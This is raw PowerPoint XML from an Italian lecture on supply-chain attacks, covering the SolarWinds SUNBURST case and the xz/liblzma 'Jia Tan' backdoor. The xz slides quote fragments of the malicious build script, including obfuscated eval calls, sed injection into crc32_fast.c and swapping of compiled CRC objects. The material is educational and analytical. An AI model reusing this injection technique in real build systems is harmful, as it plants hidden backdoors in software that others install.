          <a:p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184: $CC $DEFS $DEFAULT_INCLUDES $INCLUDES $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liblzma_la_CPPFLAGS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 $CPPFLAGS $AM_CFLAGS $CFLAGS -r liblzma_la-crc64-fast.o -x c -  $P -o .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libs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/liblzma_la-crc64_fast.o 2&gt;/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dev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/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null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; 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then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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185: 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cp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 .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libs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/liblzma_la-crc32_fast.o .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libs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/liblzma_la-crc32-fast.o || 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true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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186: 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eval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 $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BPep</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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187: 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if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 sed "/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return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is_arch_extension_supported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()/ c\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return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 _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is_arch_extension_supported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()" $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top_srcdir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/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src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/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liblzma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/check/crc32_fast.c | \</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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188: sed "/include \"crc32_arm64.h\"/a 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\\$V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" | \</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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189: sed "1i # 0 \"$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top_srcdir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/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src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/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liblzma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/check/crc32_fast.c\"" 2&gt;/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dev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/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null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 | \</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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58871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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10512832" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> Introduzione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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="73743" y="1849693"/>
            <a:ext cx="12115185" cy="470898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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Esempio: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>caso SUNBURST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SolarWinds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (2020)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="3200" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SolarWinds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> è una compagnia americana che ha come core business i tool di monitoraggio reti ed infrastrutture. Il suo software di picco è Orion, un IT performance monitor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Per funzionare, tale software accede in maniera privilegiata ai dati di log delle aziende.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gli hacker accedono a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SolarWinds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> grazie ai dati di un precedente data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>breach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Iniezione di una libreria .dll con backdoor, chiamata SUNBURST, nel sistema Orion;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Update con SUNBURST verso i clienti di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SolarWinds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gli hacker accedono ai dati dei customers ed eseguono RCE nelle aziende clienti.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L'operazione è stata condotta per 2 anni (2019-2020) dal gruppo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nobelium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="240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9377857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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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24780D70-F347-5610-235E-C66AB628A92C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107706" y="1717293"/>
            <a:ext cx="11979411" cy="240065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600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>190: $CC $DEFS $DEFAULT_INCLUDES $INCLUDES $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>liblzma_la_CPPFLAGS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t> $CPPFLAGS $AM_CFLAGS $CFLAGS -r -x c -  $P -o .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>libs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>/liblzma_la-crc32_fast.o; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>191: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>RgYB</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>192: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>AM_V_CCLD$liblzma_la_LINK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>rpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>libdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>liblzma_la_OBJECTS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>liblzma_la_LIBADD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>193: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t> test ! -f .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>libs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>/liblzma.so; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>194: mv -f .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>libs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>/liblzma_la-crc32-fast.o .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>libs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>/liblzma_la-crc32_fast.o || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>195: mv -f .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>libs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>/liblzma_la-crc64-fast.o .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>libs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>/liblzma_la-crc64_fast.o || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>196: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>197: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t> -fr .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>libs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>liblzma.a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>libs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
